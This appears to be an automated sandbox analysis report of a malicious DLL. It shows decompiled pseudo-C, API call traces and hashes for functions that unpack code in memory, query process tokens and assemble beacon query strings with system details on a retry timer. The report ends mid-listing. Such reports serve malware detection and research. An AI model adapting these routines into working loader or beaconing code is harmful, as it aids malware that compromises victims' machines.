Instruction ID: 17caae7aa51dda687ae34f9b48c54e77250d0b0395158c2460aa5dce00151b1f
Opcode Fuzzy Hash: 5ff07b24925fd61f77cfc2bbe0e63c52881b1694ee07aac61dcf968f220fede0
Instruction Fuzzy Hash: 22F0DAB4604340DFEB298BA5DE59F9937A4FB45307B058019E906C72A0C6BCEC44DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 6ED42439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6ED4283E
_free.LIBCMT ref: 6ED42893

Strings

-, xrefs: 6ED426E1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: b323647742d93f9347242615e03404c0833b8f39044c4c1a656a7023a2063108
Instruction ID: cc0ea1b4528e32e278e679e686383231262e8bdde0ceedf100881984de28c361
Opcode Fuzzy Hash: b323647742d93f9347242615e03404c0833b8f39044c4c1a656a7023a2063108
Instruction Fuzzy Hash: 62C1BF7190021ADADB649FE4CC90BEE73B8AF3535CF1044AAD949E7184EB31DA85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00751EC1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00751EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E007575F6(_t2);
				if(_t34 != 0) {
					_t30 = E007575F6(_t28);
					if(_t30 == 0) {
						E00754AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0075A971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0075A971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00751ec1
0x00751ecb
0x00751ecd
0x00751ed3
0x00751ed3
0x00751edc
0x00751ee0
0x00751eec
0x00751ef0
0x00751f64
0x00751ef2
0x00751ef2
0x00751ef6
0x00751efb
0x00751f00
0x00751f1a
0x00751f09
0x00751f09
0x00751f0d
0x00751f10
0x00751f15
0x00751f15
0x00751f1f
0x00751f47
0x00751f4d
0x00751f50
0x00751f21
0x00751f23
0x00751f2b
0x00751f36
0x00751f3b
0x00751f3b
0x00751f57
0x00751f5e
0x00751f5f
0x00751f5f
0x00751ef0
0x00751f6f

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00755405,00000000,00000000,751881D0,02D29618,?,?,00752A8A,?,02D29618), ref: 00751ECD

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

Part of subcall function 0075A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00751EFB,00000000,00000001,00000001,?,?,00755405,00000000,00000000,751881D0,02D29618), ref: 0075A97F
Part of subcall function 0075A971: StrChrA.SHLWAPI(?,0000003F,?,?,00755405,00000000,00000000,751881D0,02D29618,?,?,00752A8A,?,02D29618,0000EA60,?), ref: 0075A989

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00755405,00000000,00000000,751881D0,02D29618,?,?,00752A8A), ref: 00751F2B
lstrcpy.KERNEL32(00000000,751881D0), ref: 00751F3B
lstrcpy.KERNEL32(00000000,00000000), ref: 00751F47

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 3b30d5ead7e72af04652897e0875464aa17a13e361d4a3679b4c66eb885914c8
Instruction ID: 455241c1eca9f8021ad7dd8d31b32c6204342fc15091776a1bbde796664f8b6b
Opcode Fuzzy Hash: 3b30d5ead7e72af04652897e0875464aa17a13e361d4a3679b4c66eb885914c8
Instruction Fuzzy Hash: 9A21C072504255EFCB025F74CC49BEE7FA8EF06382B558050FC049B252D7B8D90987E0

Uniqueness

Uniqueness Score: -1.00%

Function 0075131E, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E007575F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00751333
0x00751337
0x00751341
0x00751346
0x0075134b
0x0075134d
0x00751355
0x0075135a
0x00751368
0x0075136d
0x00751377

APIs

lstrlenW.KERNEL32(004F0053,?,75145520,00000008,02D29364,?,007550AD,004F0053,02D29364,?,?,?,?,?,?,007554EF), ref: 0075132E
lstrlenW.KERNEL32(007550AD,?,007550AD,004F0053,02D29364,?,?,?,?,?,?,007554EF), ref: 00751335

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,007550AD,004F0053,02D29364,?,?,?,?,?,?,007554EF), ref: 00751355
memcpy.NTDLL(751469A0,007550AD,00000002,00000000,004F0053,751469A0,?,?,007550AD,004F0053,02D29364), ref: 00751368

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 00fed84f532ad075bb90e8e28528a93f68755fa3005f6208f1dd16713f7c2afa
Instruction ID: e4a2438ee7a58e241368df75f3cf4e6eb56a2477a3b46c8cf730371cb27dc8f6
Opcode Fuzzy Hash: 00fed84f532ad075bb90e8e28528a93f68755fa3005f6208f1dd16713f7c2afa
Instruction Fuzzy Hash: EDF03C72900118FB8B11DFA8CC8ACCF7BACEF493567414062FD04D7102E675EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007538CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02D29B10,00000000,00000000,74ECC740,0075467E,00000000), ref: 007538DA
lstrlen.KERNEL32(?), ref: 007538E2

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

lstrcpy.KERNEL32(00000000,02D29B10), ref: 007538F6
lstrcat.KERNEL32(00000000,?), ref: 00753901

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 8f561ef4f883e80ab94f4c9559f6ea8c24a0359241cb3d537c883328727f8519
Instruction ID: 7a2c28f6938f90a86d4a232e56c451299fede5ef748bc1165341088fb8e1ffd7
Opcode Fuzzy Hash: 8f561ef4f883e80ab94f4c9559f6ea8c24a0359241cb3d537c883328727f8519
Instruction Fuzzy Hash: 17E09273501324EB87129BE8AC4CDEFBBACEF896527044416FA00D3121C7A89D15CBA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5172 Parent PID: 6044 rundll32.exeCOMMON

Executed Functions

Function 6ED8DFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,000008C9,00003000,00000040,000008C9,6ED8DA28), ref: 6ED8E097
VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6ED8DA88), ref: 6ED8E0CE
VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6ED8E12E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ED8E164
VirtualProtect.KERNEL32(6ECE0000,00000000,00000004,6ED8DFB9), ref: 6ED8E269
VirtualProtect.KERNEL32(6ECE0000,00001000,00000004,6ED8DFB9), ref: 6ED8E290
VirtualProtect.KERNEL32(00000000,?,00000002,6ED8DFB9), ref: 6ED8E35D
VirtualProtect.KERNEL32(00000000,?,00000002,6ED8DFB9,?), ref: 6ED8E3B3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ED8E3CF

Memory Dump Source

Source File: 00000003.00000002.645912959.000000006ED8D000.00000040.00020000.sdmp, Offset: 6ED8D000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
Instruction ID: 9b39ac4fdf3e32e0506fadb9f5edc21ed6be796690f9b31e2b169904d688c1d8
Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
Instruction Fuzzy Hash: 2FD17772520621AFDB12CF58CD80B5277E7FF48B92F0941A5ED4A9F34AD370AA018F64

Uniqueness

Uniqueness Score: -1.00%

Function 012B5D10, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E012B5D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E012B75F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E012B4AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x012b5d1d
0x012b5d1e
0x012b5d1f
0x012b5d20
0x012b5d21
0x012b5d25
0x012b5d2c
0x012b5d3b
0x012b5d3e
0x012b5d41
0x012b5d48
0x012b5d4b
0x012b5d4e
0x012b5d51
0x012b5d54
0x012b5d5f
0x012b5d61
0x012b5d6a
0x012b5d72
0x012b5d74
0x012b5d86
0x012b5d90
0x012b5d94
0x012b5da3
0x012b5da7
0x012b5db0
0x012b5db8
0x012b5db8
0x012b5dba
0x012b5dba
0x012b5dc2
0x012b5dc8
0x012b5dcc
0x012b5dcc
0x012b5dd7

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 012B5D57
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 012B5D6A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 012B5D86

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 012B5DA3
memcpy.NTDLL(00000000,00000000,0000001C), ref: 012B5DB0
NtClose.NTDLL(?), ref: 012B5DC2
NtClose.NTDLL(00000000), ref: 012B5DCC

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 2559ff18cd77582e4b2d717163064c81b8cc0a61f7dcb599e4544a4359c18d54
Instruction ID: 520a1a91b6fa75a3b0c4299c3afa96256204e6b46dcfc6cd8ceaff840c2312e2
Opcode Fuzzy Hash: 2559ff18cd77582e4b2d717163064c81b8cc0a61f7dcb599e4544a4359c18d54
Instruction Fuzzy Hash: B4212576910219BBDB119F94DC88EEEBFBDEB08790F104022FA41AA154D7718A519FA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF5600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6ECF5696
GetModuleFileNameW.KERNEL32(00000000,6ED8B7A0,000008BB), ref: 6ECF576F

Part of subcall function 6ECF72B0: task.LIBCPMTD ref: 6ECF7352

Part of subcall function 6ECFBA20: swap.LIBCPMTD ref: 6ECFBA39

CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6ED77144,?,?,?,?,?,00000000), ref: 6ECF5950
std::locale::locale.LIBCPMTD ref: 6ECF59D8

Strings

?, xrefs: 6ECF5627

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
String ID: ?
API String ID: 756721536-1684325040
Opcode ID: 6bc26e4d1d94e258ddde5f0e8b46496c836a6b5dece99b89d2518c62ae030005
Instruction ID: 23e79dafa879c571c827a27a51892c76f7949ff74f8a5e1289b6dddae076293f
Opcode Fuzzy Hash: 6bc26e4d1d94e258ddde5f0e8b46496c836a6b5dece99b89d2518c62ae030005
Instruction Fuzzy Hash: 965230B1920514CFEB88CFA9D590AAE77F6FB4B304F108129D615AB3DCE738584ADB44

Uniqueness

Uniqueness Score: -1.00%

Function 012B44A4, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E012B44A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x12bd018; // 0x1f7541c4
				asm("bswap eax");
				_t27 =  *0x12bd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x12bd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x12bd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x12bd2e0; // 0x3f8a5a8
				_t3 = _t30 + 0x12be633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x12bd02c,  *0x12bd004, _t25);
				_t33 = E012B5B60();
				_t34 =  *0x12bd2e0; // 0x3f8a5a8
				_t4 = _t34 + 0x12be673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E012B1BBF(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x12bd2e0; // 0x3f8a5a8
					_t6 = _t83 + 0x12be8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x12bd270, 0, _t96);
				}
				_t97 = E012B137A();
				if(_t97 != 0) {
					_t78 =  *0x12bd2e0; // 0x3f8a5a8
					_t8 = _t78 + 0x12be8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x12bd270, 0, _t97);
				}
				_t98 =  *0x12bd364; // 0x52495b0
				_a32 = E012B3857(0x12bd00a, _t98 + 4);
				_t42 =  *0x12bd308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x12bd2e0; // 0x3f8a5a8
					_t11 = _t74 + 0x12be8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x12bd304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x12bd2e0; // 0x3f8a5a8
					_t13 = _t71 + 0x12be885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0x12bd270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E012BA811(GetTickCount());
						_t50 =  *0x12bd364; // 0x52495b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x12bd364; // 0x52495b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x12bd364; // 0x52495b0
						_t103 = E012B1974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x12bc2ac);
							_push(_t103);
							_t62 = E012B38CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E012B2A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E012B47D5();
								}
								RtlFreeHeap( *0x12bd270, 0, _v44); // executed
							}
							HeapFree( *0x12bd270, 0, _t103);
						}
						RtlFreeHeap( *0x12bd270, 0, _t100); // executed
					}
					HeapFree( *0x12bd270, 0, _a24);
				}
				RtlFreeHeap( *0x12bd270, 0, _t105); // executed
				return _a4;
			}

0x012b44a4
0x012b44a4
0x012b44a4
0x012b44a9
0x012b44af
0x012b44b9
0x012b44bb
0x012b44bb
0x012b44c8
0x012b44d3
0x012b44d6
0x012b44e1
0x012b44e4
0x012b44e9
0x012b44ec
0x012b44f1
0x012b44f4
0x012b4500
0x012b450d
0x012b450f
0x012b4515
0x012b451a
0x012b4525
0x012b4527
0x012b452a
0x012b452c
0x012b4531
0x012b4535
0x012b4537
0x012b453c
0x012b4548
0x012b454a
0x012b4556
0x012b4558
0x012b4558
0x012b4563
0x012b4567
0x012b4569
0x012b456e
0x012b457a
0x012b457c
0x012b4588
0x012b458a
0x012b458a
0x012b4590
0x012b45a3
0x012b45a7
0x012b45ae
0x012b45b1
0x012b45b6
0x012b45c1
0x012b45c3
0x012b45c6
0x012b45c6
0x012b45c8
0x012b45cf
0x012b45d2
0x012b45d7
0x012b45e1
0x012b45e3
0x012b45eb
0x012b45fe
0x012b4604
0x012b4608
0x012b4614
0x012b4619
0x012b4622
0x012b4633
0x012b4637
0x012b4640
0x012b4646
0x012b4653
0x012b4660
0x012b4666
0x012b4672
0x012b4678
0x012b4679
0x012b467e
0x012b4684
0x012b468a
0x012b4691
0x012b4698
0x012b469e
0x012b46a5
0x012b46a9
0x012b46b4
0x012b46b9
0x012b46bf
0x012b46c8
0x012b46c8
0x012b46d9
0x012b46d9
0x012b46e8
0x012b46e8
0x012b46f7
0x012b46f7
0x012b4709
0x012b4709
0x012b4718
0x012b4729

APIs

GetTickCount.KERNEL32 ref: 012B44BB
wsprintfA.USER32 ref: 012B4508
wsprintfA.USER32 ref: 012B4525
wsprintfA.USER32 ref: 012B4548
HeapFree.KERNEL32(00000000,00000000), ref: 012B4558
wsprintfA.USER32 ref: 012B457A
HeapFree.KERNEL32(00000000,00000000), ref: 012B458A
wsprintfA.USER32 ref: 012B45C1
wsprintfA.USER32 ref: 012B45E1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012B45FE
GetTickCount.KERNEL32 ref: 012B460E
RtlEnterCriticalSection.NTDLL(05249570), ref: 012B4622
RtlLeaveCriticalSection.NTDLL(05249570), ref: 012B4640

Part of subcall function 012B1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,012B4653,?,052495B0), ref: 012B199F
Part of subcall function 012B1974: lstrlen.KERNEL32(?,?,?,012B4653,?,052495B0), ref: 012B19A7
Part of subcall function 012B1974: strcpy.NTDLL ref: 012B19BE
Part of subcall function 012B1974: lstrcat.KERNEL32(00000000,?), ref: 012B19C9
Part of subcall function 012B1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,012B4653,?,052495B0), ref: 012B19E6

StrTrimA.SHLWAPI(00000000,012BC2AC,?,052495B0), ref: 012B4672

Part of subcall function 012B38CA: lstrlen.KERNEL32(05249B10,00000000,00000000,74ECC740,012B467E,00000000), ref: 012B38DA
Part of subcall function 012B38CA: lstrlen.KERNEL32(?), ref: 012B38E2
Part of subcall function 012B38CA: lstrcpy.KERNEL32(00000000,05249B10), ref: 012B38F6
Part of subcall function 012B38CA: lstrcat.KERNEL32(00000000,?), ref: 012B3901

lstrcpy.KERNEL32(00000000,?), ref: 012B4691
lstrcpy.KERNEL32(00000000,00000000), ref: 012B4698
lstrcat.KERNEL32(00000000,?), ref: 012B46A5
lstrcat.KERNEL32(00000000,00000000), ref: 012B46A9
RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 012B46D9
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012B46E8
RtlFreeHeap.NTDLL(00000000,00000000,?,052495B0), ref: 012B46F7
HeapFree.KERNEL32(00000000,00000000), ref: 012B4709
RtlFreeHeap.NTDLL(00000000,?), ref: 012B4718

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
String ID:
API String ID: 3963266935-0
Opcode ID: d5f09e2f886da4a69fa859312bec2bd0c6f4f56a659343b3ba972bb06e6efa06
Instruction ID: 41bfffef3bd0fa34e755c837068829f92322f75b373b95d1e631be0ba48f9c79
Opcode Fuzzy Hash: d5f09e2f886da4a69fa859312bec2bd0c6f4f56a659343b3ba972bb06e6efa06
Instruction Fuzzy Hash: A961A271500249AFD731AFA8FCCCFD63BA8FB49394F050424FA05D3256DA34E9169B65

Uniqueness

Uniqueness Score: -1.00%

Function 012B5461, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E012B5461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x12bd278);
					_v20 = 0;
					_v16 = 0;
					L012BAED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x12bd2a4; // 0x2ec
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x12bd284 = 5;
						} else {
							_t68 = E012B502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x12bd298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E012B577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E012B2107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x12bd27c);
							goto L21;
						} else {
							__eflags =  *0x12bd280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E012B47D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x12bd280);
								L21:
								L012BAED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x12bd270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x012b5461
0x012b5473
0x012b5476
0x012b5482
0x012b5488
0x012b548d
0x012b55f4
0x012b5493
0x012b5493
0x012b5495
0x012b549a
0x012b549b
0x012b54a1
0x012b54a4
0x012b54a7
0x012b54b5
0x012b54c0
0x012b54c3
0x012b54c5
0x012b54d2
0x012b54dc
0x012b54de
0x012b54e3
0x012b54e8
0x012b54f3
0x012b54f3
0x012b54ea
0x012b54ea
0x012b54f1
0x00000000
0x00000000
0x012b54f1
0x012b54fd
0x00000000
0x012b5500
0x012b5504
0x012b550f
0x012b550f
0x012b5516
0x012b551f
0x012b5526
0x012b552f
0x012b5532
0x012b5535
0x012b553a
0x012b553f
0x00000000
0x00000000
0x012b5541
